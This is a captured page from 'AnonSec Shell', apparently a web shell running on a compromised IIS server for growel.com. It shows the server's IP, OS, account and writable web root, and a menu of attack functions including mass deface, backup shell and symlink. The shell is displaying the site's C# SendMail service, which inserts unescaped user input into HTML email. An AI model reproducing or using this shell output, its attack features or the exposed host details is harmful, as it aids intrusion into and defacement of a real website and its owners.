. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 87.98.249.37  /  Your IP : 216.73.216.208   [ Reverse IP ]
Web Server : Microsoft-IIS/10.0
System : Windows NT NS3076740 10.0 build 17763 (Windows Server 2019) AMD64
User : IWPD_292(growel19p) ( 0)
PHP Version : 8.3.12
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Inetpub/vhosts/growel.com/httpdocs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : C:/Inetpub/vhosts/growel.com/httpdocs//SendMail.asmx.cs
using BLL.Bo;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.Services;

namespace GrowelWeb
{
    /// <summary>
    /// Summary description for SendMail
    /// </summary>
    [WebService(Namespace = "http://tempuri.org/")]
    [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
    [System.ComponentModel.ToolboxItem(false)]
    // To allow this Web Service to be called from script, using ASP.NET AJAX, uncomment the following line. 
    // [System.Web.Script.Services.ScriptService]
    public class SendMail : System.Web.Services.WebService
    {

        [WebMethod]
        public string HelloWorld()
        {
            return "Hello World";
        }


        [WebMethod]
        public string Send(string Subject, string ClientName, string Country, string StateName, string CityName, 
                string MobileNo, string EmailId, string Description, string Vertical)
        //EnquiryBo bo
        {


            string message =

                "Dear " + ClientName + ", <br>" +
                "<table width='500' border='0' align='center' cellpadding='10' cellspacing='4' style='font-family:Arial, Helvetica, sans-serif;font-size:12px;border:1px solid #ddd;'><tr><td colspan='2' align='center' valign='top'><p><img src='https://growel.com/Includes/images/logo.png'>" +
                "</p></td></tr><tr><td width='200' align='right' valign='top'>" +
                "<strong>Name Of The Person </strong></td><td>" + ClientName + "</td></tr>" +
                "<tr><td align='right' valign='top'><strong>Country </strong></td><td>" + Country + "</td></tr>" +
                "<tr><td align='right' valign='top'><strong>State </strong></td><td>" + StateName + "</td></tr>" +
                "<tr><td align='right' valign='top'><strong>City </strong></td><td>" + CityName + "</td></tr>" +
                "<tr><td align='right' valign='top'><strong>Mobile </strong></td><td>" + MobileNo + "</td></tr>" +
                "<tr><td align='right' valign='top'><strong>Email</strong></div></td><td>" +EmailId + "</td></tr>" +
                "<tr><td align='right' valign='top'><strong>Vertical</strong></div></td><td>" + Vertical + "</td></tr>" +

                "<tr><td align='right' valign='top'><strong>Feedback Details</strong></td><td>" + Description + "</td></tr>";



            message += "<tr><td align='right' valign='top'>&nbsp;</td><td>&nbsp;</td></tr></table><p>&nbsp;</p>";

            clsComman clsComman = new clsComman();
            clsComman.SendMail(Subject, message);
            return "done";
        }

    }
}

Anon7 - 2022
AnonSec Team